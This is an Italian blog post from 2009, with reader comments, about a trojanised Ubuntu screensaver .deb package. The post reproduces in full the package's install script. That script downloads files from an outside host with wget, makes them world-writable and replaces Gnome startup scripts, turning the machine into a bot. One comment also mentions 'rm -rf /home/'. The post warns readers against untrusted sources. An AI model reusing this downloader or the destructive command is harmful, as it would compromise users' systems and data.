Primi virus per linux – Occorrerà un antivirus anche su questo OS?

Scritto da il 10 dicembre, 2009


Questa mattina girovagando per la rete trovo un fatto interessante e alquanto inquietante, sul forum di Ubuntu un utente segnala un problema con l’installazione di un pacchetto scaricato da un sito non affidabile, che avrebbe dovuto contenere uno screensaver. Il problema è proprio questo, dopo averlo installato non riesce a farlo funzionare.

Siccome non è un utente alle prime armi e i pacchetti deb non sono altro che un archivio zippato, lo scompatta e guarda cosa c’è dentro. L’attenzione è quindi rivolta allo script che viene eseguito all’installazione del pacchetto che riporto qui di seguito:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

Lo script quindi si collega ad un sito (http://05748.t35.com) dal quale scarica alcuni file che vanno a sostituire gli script di avvio di Gnome e del terminale, trasformando il PC in un bot controllato da remoto.

I due file scaricati non sono più raggiungibili al momento, quindi il virus non è più attivo, ma non si sa da quanto sia presente in rete e se ha già fatto danni ad altri utenti.

Bisogna comunque specificare che non è stato Ubuntu o comunque il sistema operativo linux ad avere problemi di sicurezza, quanto piuttosto un utente sprovveduto che ha installato un programma da un sito non affidabile. Tutto questo significa che man mano che linux si diffonde anche l’attenzione dei virus writer si aumenta.

Il consiglio quindi è sempre quello di controllare da dove si scarica il software e installare solo quello che proviene da fonti ufficiali.

Articoli correlati

Nessun articolo correlato.

Tag:,

Se ti è piaciuto questo articolo, lascia un commento oppure sottoscrivi il feed per leggere anche gli articoli futuri appena usciti.

  • http://linea-dombra.blogspot.com/ kurtz77

    Cito:
    “Bisogna comunque specificare che non è stato Ubuntu o comunque il sistema operativo linux ad avere problemi di sicurezza, quanto piuttosto un utente sprovveduto che ha installato un programma da un sito non affidabile.”
    Ma perchè sugli altri sistemi il malware come si diffonde? C'è sempre un “utente sprovveduto” su Windows, MAC ed a questo punto anche Linux che prima o poi ci casca.
    Se esiste un problema quello viene dalla possibilità di permettere l'installazione del software solo coi diritti di amministratore. Esistono gli strumenti per circoscrivere l'entità di un danno irreparabile per il sistema. Non sta scritto da nessuna parte che una applicazione debba per forza stare nelle cartelle del sistema. A maggior ragione quando il sistema é usato da una sola persona, che potrebbe tenere i propri applicativi nel suo spazio (come accade nei MAC per esempio). RPM, tanto per dirne una, permette di installare i pacchetti in cartelle non standard, basta preparare degli spec ad hoc e compilare tutto. Klick si comporta più o meno come i pacchetti applicazione del MAC e permette di gestire le applicazioni nella home direttamente “montando” una immagine dell'applicazione stessa.
    Il sistema dovrebbe essere oggetto dei soli aggiornamenti ufficiali per il bugfixing e/o l'aggiunta di features previste dal distributore/sviluppatore, il resto, francamente, lo terrei fuori. :)

    Ciao

    • http://www.guidemondopc.org/ TizioIncognito

      A mio parere il problema non è dove risiede il virus, esiste comunque la possibilità anche da utente di impostare qualcosa per avviarsi al boot ad esempio.
      Il fatto è che comunque bisogna stare più attenti, infatti i file che interessano all'utente non sono nella cartelle di sistema, ma nella propria home. Se al posto di quello script ci fosse stato “rm -rf /home/” sarebbe stato ben peggio.

10 queries. 0,914 seconds.